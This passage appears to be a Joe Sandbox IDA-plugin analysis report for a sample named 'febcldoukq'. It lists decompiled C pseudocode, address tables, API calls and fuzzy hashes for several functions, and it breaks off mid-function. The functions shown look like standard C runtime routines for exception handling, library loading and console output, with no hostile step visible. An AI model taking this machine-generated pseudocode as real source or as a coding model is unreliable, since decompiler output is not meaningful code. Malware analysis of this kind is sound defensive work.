				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E00B21C6E(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00B21C6E(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E00B2430E(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E00B241BE(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00B27E27(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00B21BDC(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00B26200(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00B26200(_t65, _t83);
				}
			}






































                                              0x00b27ea7
                                              0x00b27ea7
                                              0x00b27ea7
                                              0x00b27eae
                                              0x00b27eb7
                                              0x00b27fd6
                                              0x00b27ebd
                                              0x00b27ebd
                                              0x00b27ebe
                                              0x00b27ebf
                                              0x00b27ec9
                                              0x00b27ecc
                                              0x00b27ed2
                                              0x00b27edc
                                              0x00b27f01
                                              0x00b27f06
                                              0x00b27f0b
                                              0x00b27fd2
                                              0x00000000
                                              0x00b27fd3
                                              0x00b27f0b
                                              0x00b27edc
                                              0x00b27f11
                                              0x00b27f14
                                              0x00b27f17
                                              0x00b27f1d
                                              0x00b27f35
                                              0x00b27f3a
                                              0x00b27f3d
                                              0x00b27f40
                                              0x00b27f43
                                              0x00b27f46
                                              0x00b27f4c
                                              0x00b27f52
                                              0x00b27f55
                                              0x00b27f58
                                              0x00b27f67
                                              0x00b27f68
                                              0x00b27f68
                                              0x00b27f6d
                                              0x00b27f80
                                              0x00b27f82
                                              0x00b27f87
                                              0x00b27f92
                                              0x00b27f94
                                              0x00b27f96
                                              0x00b27fb2
                                              0x00b27fb7
                                              0x00b27fba
                                              0x00b27fba
                                              0x00b27f92
                                              0x00b27f87
                                              0x00b27fc0
                                              0x00b27fc1
                                              0x00b27fc4
                                              0x00b27fc7
                                              0x00b27fca
                                              0x00b27fcd
                                              0x00b27f58
                                              0x00000000
                                              0x00b27f4c
                                              0x00b27fd7
                                              0x00b27fdc
                                              0x00b27fdd
                                              0x00b27fde
                                              0x00b27fdf
                                              0x00b27fee
                                              0x00b27ffe
                                              0x00b28005
                                              0x00b2800b
                                              0x00b2800c
                                              0x00b28018
                                              0x00b2801a
                                              0x00b2801a
                                              0x00b28029
                                              0x00b28029

                                              APIs
                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B27DAD,?,?,00000000,00000000,00000000,?), ref: 00B27ECC
                                              • CatchIt.LIBVCRUNTIME ref: 00B27FB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CatchEncodePointer
                                              • String ID: MOC$RCC
                                              • API String ID: 1435073870-2084237596
                                              • Opcode ID: 30f8db3a817e9b2e16fe87bdbe8ce176b3ecb5ea3df40d020c2c41ca4cf4a67e
                                              • Instruction ID: bd4dede3a8b957a8156d572288f01ba81ba09b77f97679863e6f080e84c8ed1d
                                              • Opcode Fuzzy Hash: 30f8db3a817e9b2e16fe87bdbe8ce176b3ecb5ea3df40d020c2c41ca4cf4a67e
                                              • Instruction Fuzzy Hash: C641AB72908299AFCF15CF98ED81AEEBBF5FF08304F144099F9086B211D7359950CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B131B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: MessagePostTimer
                                              • String ID: 2$2
                                              • API String ID: 2370412193-3784399050
                                              • Opcode ID: de5cfe9618c366143b12fb912eed1631ec9631a71645c47d229303d1474c6411
                                              • Instruction ID: e77d7ef33314afc2fd51389d51cb3465ee29213223e31bbf595b1b8aef16f1c1
                                              • Opcode Fuzzy Hash: de5cfe9618c366143b12fb912eed1631ec9631a71645c47d229303d1474c6411
                                              • Instruction Fuzzy Hash: 641193B4108204EFD700EF5CC188BA97BE0FB04754F85C4A9E88D8B2A1D7B5DA88CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B26086 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B26086(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00B24A59(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                              0x00b26093
                                              0x00b2609b
                                              0x00b260d0
                                              0x00b2609d
                                              0x00b260a6
                                              0x00000000
                                              0x00b260cd
                                              0x00b260cc
                                              0x00b260cc

                                              APIs
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00B26122,?,?,00000000,?,?,?,00B25F6A,00000000,FlsAlloc,00B2D668,00B2D670), ref: 00B26093
                                              • GetLastError.KERNEL32(?,00B26122,?,?,00000000,?,?,?,00B25F6A,00000000,FlsAlloc,00B2D668,00B2D670,?,?,00B21C2A), ref: 00B2609D
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00B21C2A,00B21D0E,00000003,00B2148B,?,?,?,?,00000000,00000000,00000000), ref: 00B260C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 194327323c770686447c94d16317f8330cedfb59b1bc4f5bb238d7fc7e70578c
                                              • Instruction ID: 87b37d3a0b8c2b5a66d5d69d40c9327d6a4faacce61c0f0fe377c59020b02b9d
                                              • Opcode Fuzzy Hash: 194327323c770686447c94d16317f8330cedfb59b1bc4f5bb238d7fc7e70578c
                                              • Instruction Fuzzy Hash: CDE04F30680208B7EB202F65FC46F5D3BACFB01B40F208571F90DA90E1EFA1D8149944
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B269C1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E00B269C1(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0xb2af8d);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0xb34050; // 0x245fde3e
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0xb362e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00B21490(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0xb362e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0xb362e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0xb362e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00B28745(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00B28745(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0xb347b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0xb362e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E00B28980( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0xb347b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0xb362e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E00B1F6B0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0xb362e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00B28980( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00B25A29(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E00B1DB25(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                                              0x00b269c6
                                              0x00b269c8
                                              0x00b269d3
                                              0x00b269d4
                                              0x00b269d7
                                              0x00b269dc
                                              0x00b269de
                                              0x00b269e4
                                              0x00b269e8
                                              0x00b269ee
                                              0x00b269f3
                                              0x00b269f9
                                              0x00b269fc
                                              0x00b269ff
                                              0x00b26a02
                                              0x00b26a05
                                              0x00b26a08
                                              0x00b26a12
                                              0x00b26a19
                                              0x00b26a21
                                              0x00b26a24
                                              0x00b26a2a
                                              0x00b26a2e
                                              0x00b26a31
                                              0x00b26a35
                                              0x00b26a35
                                              0x00b26a3d
                                              0x00b26a45
                                              0x00b26a4a
                                              0x00b26a4b
                                              0x00b26a4c
                                              0x00b26a4d
                                              0x00b26a50
                                              0x00b26a52
                                              0x00b26a58
                                              0x00b26a5e
                                              0x00b26a61
                                              0x00b26a63
                                              0x00b26a66
                                              0x00b26a6f
                                              0x00b26a75
                                              0x00b26a78
                                              0x00b26a7f
                                              0x00b26a86
                                              0x00b26a89
                                              0x00b26bc3
                                              0x00b26bc7
                                              0x00b26bca
                                              0x00b26bed
                                              0x00b26bf3
                                              0x00b26bf5
                                              0x00b26bf9
                                              0x00b26c2a
                                              0x00b26c2d
                                              0x00b26c2f
                                              0x00000000
                                              0x00b26bfb
                                              0x00b26bfb
                                              0x00b26bfe
                                              0x00b26c01
                                              0x00b26c04
                                              0x00b26d4e
                                              0x00b26d5c
                                              0x00b26d65
                                              0x00b26c0a
                                              0x00b26c14
                                              0x00b26c19
                                              0x00b26c1c
                                              0x00b26c1f
                                              0x00b26c25
                                              0x00000000
                                              0x00b26c25
                                              0x00b26c1f
                                              0x00b26c04
                                              0x00b26bcc
                                              0x00b26bd3
                                              0x00b26bd6
                                              0x00b26bd9
                                              0x00b26bdb
                                              0x00b26bde
                                              0x00b26be5
                                              0x00b26be7
                                              0x00b26c30
                                              0x00b26c33
                                              0x00b26c34
                                              0x00b26c39
                                              0x00b26c3c
                                              0x00b26c3f
                                              0x00b26c45
                                              0x00000000
                                              0x00b26c45
                                              0x00b26c3f
                                              0x00b26a8f
                                              0x00b26a92
                                              0x00b26a94
                                              0x00b26a96
                                              0x00b26a9a
                                              0x00b26a9b
                                              0x00b26a9f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b26a9f
                                              0x00b26aa4
                                              0x00b26aa6
                                              0x00b26aab
                                              0x00b26b6b
                                              0x00b26b72
                                              0x00b26b73
                                              0x00b26b76
                                              0x00b26b78
                                              0x00b26d28
                                              0x00b26d2a
                                              0x00000000
                                              0x00b26d2c
                                              0x00b26d2c
                                              0x00b26d2f
                                              0x00b26d3e
                                              0x00b26d42
                                              0x00b26d43
                                              0x00b26d43
                                              0x00000000
                                              0x00b26d47
                                              0x00000000
                                              0x00b26b7e
                                              0x00b26b83
                                              0x00b26b86
                                              0x00b26b89
                                              0x00b26b8f
                                              0x00b26b98
                                              0x00b26ba3
                                              0x00b26ba8
                                              0x00b26bab
                                              0x00b26bae
                                              0x00b26bb7
                                              0x00b26bb7
                                              0x00b26bba
                                              0x00000000
                                              0x00b26bba
                                              0x00b26bae
                                              0x00b26ab1
                                              0x00b26ab4
                                              0x00b26aba
                                              0x00b26abc
                                              0x00b26ac9
                                              0x00b26aca
                                              0x00b26acd
                                              0x00b26ad0
                                              0x00b26ad5
                                              0x00b26cf9
                                              0x00b26cfb
                                              0x00b26cfd
                                              0x00b26d00
                                              0x00b26d03
                                              0x00b26d0f
                                              0x00b26d12
                                              0x00b26d14
                                              0x00b26d15
                                              0x00b26d19
                                              0x00b26d1c
                                              0x00b26d1c
                                              0x00b26d20
                                              0x00b26d20
                                              0x00b26d20
                                              0x00b26d23
                                              0x00b26d23
                                              0x00b26adb
                                              0x00b26adb
                                              0x00b26ade
                                              0x00b26ae0
                                              0x00b26ae3
                                              0x00b26ae5
                                              0x00b26ae9
                                              0x00b26aea
                                              0x00b26aeb
                                              0x00b26aef
                                              0x00b26af4
                                              0x00b26afe
                                              0x00b26b03
                                              0x00b26b06
                                              0x00b26b06
                                              0x00b26b09
                                              0x00b26b0c
                                              0x00b26b0e
                                              0x00b26b11
                                              0x00b26b1a
                                              0x00b26b1e
                                              0x00b26b1f
                                              0x00b26b26
                                              0x00b26b2c
                                              0x00b26b34
                                              0x00b26b3f
                                              0x00b26b44
                                              0x00b26b4f
                                              0x00b26b54
                                              0x00b26b5a
                                              0x00b26b63
                                              0x00b26bbd
                                              0x00b26bbd
                                              0x00b26c48
                                              0x00b26c4d
                                              0x00b26c5f
                                              0x00b26c64
                                              0x00b26c67
                                              0x00b26c6c
                                              0x00b26c87
                                              0x00b26d6a
                                              0x00b26d70
                                              0x00b26c8d
                                              0x00b26c8d
                                              0x00b26c98
                                              0x00b26c9a
                                              0x00b26c9d
                                              0x00b26ca6
                                              0x00b26cb0
                                              0x00000000
                                              0x00b26cb2
                                              0x00b26cb4
                                              0x00b26cb6
                                              0x00b26ccf
                                              0x00000000
                                              0x00b26cd5
                                              0x00b26cd9
                                              0x00b26cdf
                                              0x00b26ce2
                                              0x00b26ce8
                                              0x00b26ceb
                                              0x00000000
                                              0x00b26ceb
                                              0x00b26cd9
                                              0x00b26ccf
                                              0x00b26cb0
                                              0x00b26ca6
                                              0x00b26c87
                                              0x00b26c6c
                                              0x00b26b5a
                                              0x00b26ad5
                                              0x00b26aab
                                              0x00000000
                                              0x00b26cee
                                              0x00b26cee
                                              0x00b26cf7
                                              0x00b26d72
                                              0x00b26d77
                                              0x00b26d7f
                                              0x00b26d80
                                              0x00b26d81
                                              0x00b26d8d
                                              0x00000000

                                              APIs
                                              • GetConsoleOutputCP.KERNEL32(245FDE3E,?,00000000,?), ref: 00B26A24
                                                • Part of subcall function 00B25A29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B2649D,?,00000000,-00000008), ref: 00B25AD5
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B26C7F
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B26CC7
                                              • GetLastError.KERNEL32 ref: 00B26D6A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                              • String ID:
                                              • API String ID: 2112829910-0
                                              • Opcode ID: 88cde4cd0b3141dbf989e5ee2aff46f1330b0e00c9cf306721cc4a941e51f132
                                              • Instruction ID: ae88dde21ea68ad2baf61aec3781a0d31e9043732080261fd59f716421e6a2d3
                                              • Opcode Fuzzy Hash: 88cde4cd0b3141dbf989e5ee2aff46f1330b0e00c9cf306721cc4a941e51f132
                                              • Instruction Fuzzy Hash: EAD15C75E042689FCF15CFA8E880AADBBF5FF09344F2845AAE859E7351D730A941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B278AB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E00B278AB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xb33388);
				E00B1D900(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00B1F6B0(_t107, E00B1DD40(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00B1F6B0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
